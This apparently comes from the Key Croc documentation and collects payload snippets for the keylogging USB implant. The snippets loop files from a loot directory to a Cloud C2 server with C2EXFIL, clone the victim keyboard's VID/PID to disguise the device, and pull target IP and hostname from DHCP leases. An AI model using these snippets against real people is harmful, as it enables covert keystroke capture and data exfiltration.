Helpful Payload Snippets
The
C2EXFIL
tool, used to exfiltrate files to the configured Cloud C2 server, normally only handles one file at a time. Using a for loop, one may iterate over multiple files in a directory.FILES="$LOOT_DIR/*.txt"
for f in $FILES; do C2EXFIL STRING $f Example; done
By default the Key Croc boots into Attack Mode and clones the
VID
and PID
values of the connected human interface device (HID Keyboard).The
VID
and PID
values are stored in the /tmp/vidpid directory and may be referenced in a payload using the following:# Set ATTACKMODE to HID and Ethernet with cloned keyboard VID/PID
VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
ATTACKMODE HID ECM_ETHERNET VID_0X$VENDOR PID_0X$PRODUCT
If the Key Croc is in the Attack Mode, rather than Arming Mode, the
/tmp/attackmode
file will exist.Checking the current
ATTACKMODE
The Key Croc stores its current
ATTACKMODE
in the file /tmp/mode
. In addition to the ATTACKMODE
options like HID
or SERIAL
, the /tmp/mode file reports all additional parameters such as VID
and PID
. These values may be passed to a new ATTACKMODE
command using the bash command substitution feature. In this example, the output of "cat /tmp/mode
", inside of the $()
directive, is substituted.root@croc:~# cat /tmp/mode
HID VID_0X04B3 PID_0X3025
root@croc:~# ATTACKMODE ECM_ETHERNET $(cat /tmp/mode)
TARGET_IP = 172.16.64.10, TARGET_HOSTNAME = kali, HOST_IP = 172.16.64.1
root@croc:~#
While the
ECM_ETHERNET
and RNDIS_ETHERNET
options for ATTACKMODE
will display the Target IP address and hostname interactively, these values may also be used in a payload. To store these values in a variable, use the following:GET_VARS
# This exports the following variables:
$TARGET_IP
$TARGET_HOSTNAME
$HOST_IP
Alternatively, these target values may be obtained from the following:
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
And the host IP (the IP address of the Key Croc itself) can be determined with the following:
HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
However, unless changed from its default this value will be 172.16.64.1.
From firmware 1.3+, many functions of the Key Croc may be exposed by sourcing the croc_framework. The
GET_HELPERS
command provides an outline of their functions:root@croc:~/loot# GET_HELPERS
Available helper functions provided by sourcing croc_framework
MOUNT_UDISK
Mounts udisk and handles syncing /root/loot/ and /root/udisk/loot
UNMOUNT_UDISK
Safely Unmounts udisk
UPDATE_LANGUAGES
Copy language files from udisk to the croc
ENABLE_INTERFACE
Enables wlan0
CLEAR_WIFI_CONFIG
Remove wpa_supplicant.conf to clear current wireless configuration
CONFIG_OPEN_WIFI
Generate a wpa_supplicant.conf for open wifi
Example: CONFIG_OPEN_WIFI 'attwifi'
CONFIG_PSK_WIFI
Generate a wpa_supplicant.conf for psk wifi
Example: CONFIG_PSK_WIFI 'attwifi' 'password'
START_WLAN_DHCP
Start dhcp on wlan0
ENABLE_WIFI
Enable wifi helper
configures wpa_supplicant, indicates using LED,
enables interface, starts wpa_supplicant and dhcp
Example psk: ENABLE_WIFI 'attwifi' 'password'
Example open: ENABLE_WIFI 'attwifi'
DISABLE_SSH
Disable SSH service
ENABLE_SSH
Enable SSH service